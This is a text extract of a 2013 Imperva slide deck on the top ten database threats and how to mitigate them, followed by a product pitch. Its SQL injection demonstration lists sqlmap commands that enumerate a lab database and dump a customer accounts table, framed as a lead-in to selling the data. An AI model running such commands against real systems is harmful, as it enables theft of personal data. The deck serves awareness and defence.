Embed Size (px)
Citation preview
© 2013 Imperva, Inc. All rights reserved.
Top 10 Database Threats
ISACA Charlotte Chapter
Confidential 1
Presented by Eric Gerena
© 2013 Imperva, Inc. All rights reserved.
Agenda
Background
Top 10 Database Threats
Neutralizing the Threats
SQLi Attack Demonstration
Q&A
© Copyright 2012 Imperva, Inc. All rights reserved. 2
© 2013 Imperva, Inc. All rights reserved.
Background
© 2013 Imperva, Inc. All rights reserved.
What’s Changed?
© 2013 Imperva, Inc. All rights reserved.
Top 10 Database Threats
Confidential 5
Are you at risk?
© 2013 Imperva, Inc. All rights reserved.
1. Excessive & Unused Privileges
© 2013 Imperva, Inc. All rights reserved.
2. Privilege Abuse
© 2013 Imperva, Inc. All rights reserved.
3. SQLi (SQL Injection)
© 2013 Imperva, Inc. All rights reserved.
4. Malware
© 2013 Imperva, Inc. All rights reserved.
5. Weak Audit Trail
© 2013 Imperva, Inc. All rights reserved.
6. Storage Media Exposure
© 2013 Imperva, Inc. All rights reserved.
7. Database Vulnerability Exploitation
© 2013 Imperva, Inc. All rights reserved.
8. Unmanaged Sensitive Data
© 2013 Imperva, Inc. All rights reserved.
9. Denial of Service (DoS)
© 2013 Imperva, Inc. All rights reserved.
10. Limited Security Expertise & Education
© 2013 Imperva, Inc. All rights reserved.
Neutralizing the Threats
Confidential 16
Risk Mitigation
© 2013 Imperva, Inc. All rights reserved.
How to Neutralize the Threats
CONFIDENTIAL
Discover, Classify & Assess
User Rights Management
Auditing, Monitoring & Protecting
Data Protection
Non-Technical Security
© 2013 Imperva, Inc. All rights reserved.
Discover, Classify & Assess
Rogue
SSN
Credit Cards
PII
Discover Active DBs
Discover Rogue DBs
Classify DBs
Vulnerability Assessments
Risk
© 2013 Imperva, Inc. All rights reserved.
User Rights Management
Reduce Unwarranted Data Access
Map Rights to Individuals
Identify Dormant Accounts
Enforce “Need-to-Know”
Comply
© 2013 Imperva, Inc. All rights reserved.
Auditing, Monitoring & Protecting
UPDATE orders set client ‘first Unusual Activity
X Allow
Block
Network User, DBAs, Sys Admin
X
Real Time Alerting & Blocking
Detect Unusual DB Activity
Monitor Local DB Activity
Impose Connection Controls
© 2013 Imperva, Inc. All rights reserved.
Data Protection
Tamper-Proof Audit Trail
Storage Encryption
© 2013 Imperva, Inc. All rights reserved.
Non-Technical Security
User Education & Awareness
Cultivate Experienced Security Professionals
© 2013 Imperva, Inc. All rights reserved.
Risk Reduction
CONFIDENTIAL 23
0
5
10
15
20
25
30
35
Q1-2103 Q2-2013 Q3-2013 Q4-2013
AwarenessAuditVulnerabilities
© 2013 Imperva, Inc. All rights reserved.
SQLi Attack Demonstration
Confidential 24
It still works!
© 2013 Imperva, Inc. All rights reserved.
Anatomy of the Attack
Identify the Vulnerability
Exploit the Vulnerability
Compromi$e the Victim
© 2013 Imperva, Inc. All rights reserved.
So, what tools will be used?
Identify the Vulnerability
Exploit the Vulnerability
Compromi$e the Victim
Commercial Web App Vulnerability Scanner
DB Exploit Tool "SQLMap"
© 2013 Imperva, Inc. All rights reserved.
SQLMap Attack Commands
Identify All Databases and Current Database ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything --dbs
./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything --current-db
Identify Table(s) of Interest and Associated Columns ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db
--tables ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db
-T Legacy_Customer_Accounts --columns
Dump Records from Identified Table and Columns ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db
-T Legacy_Customer_Accounts --columns --dump >> /root/Desktop/SQLi-Attack-Results.txt
© 2013 Imperva, Inc. All rights reserved.
Off to the Black Market!
© 2013 Imperva, Inc. All rights reserved.
Imperva
Confidential 29
Data Security Solutions
© 2013 Imperva, Inc. All rights reserved.
Imperva Highlights
About Imperva • Founded: 2002 • CEO: Shlomo Kramer, Co-Founder of Check Point • HQ in Redwood Shores, CA • 1,800+ customers; 25,000+ organizations • Customers in 50+ countries
The Problems We Solve The Problems We Solve Protecting the Data that Drives Business Maintaining Regulatory Compliance
30
Company Highlights • 480+ Employees • $104M in Revenue • $48M Deferred Revenue • Cash & CE: $ 102M • Publicly Traded: IMPV
2010 2011 2012 2013
33% YoY Growth
© 2013 Imperva, Inc. All rights reserved.
The Solution
Confidential 31
Solving the business security problem requires a new protection layer positioned closely around the data and applications in the data center
External Customers
Staff, Partners Hackers
Internal Employees
Malicious Insiders Compromised Insiders
Data Center Systems and Admins
Tech. Attack Protection
Logic Attack Protection
Fraud Prevention
Usage Audit
User Rights Management
Access Control
IMPERVA’S MISSION IS TO PROVIDE A COMPLETE SOLUTION
© 2013 Imperva, Inc. All rights reserved.
Databases - Coverage
Coverage for Heterogeneous Databases
DB2 DB2 z/OS DB2400 Informix Netezza
© 2013 Imperva, Inc. All rights reserved.
Web Scanner Integration
33
© 2013 Imperva, Inc. All rights reserved.
Thank You
Confidential 34
Imperva Data Security Solutions
